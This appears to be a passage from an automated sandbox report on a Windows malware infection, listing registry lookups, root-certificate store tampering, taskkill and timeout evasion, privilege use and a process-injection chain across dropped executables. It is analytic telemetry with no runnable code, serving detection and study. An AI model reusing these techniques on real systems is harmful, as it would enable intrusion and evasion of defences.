Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\kplnh\nvwjc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\ProgramData\kplnh\nvwjc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 2780 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1796 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 108 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2780 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
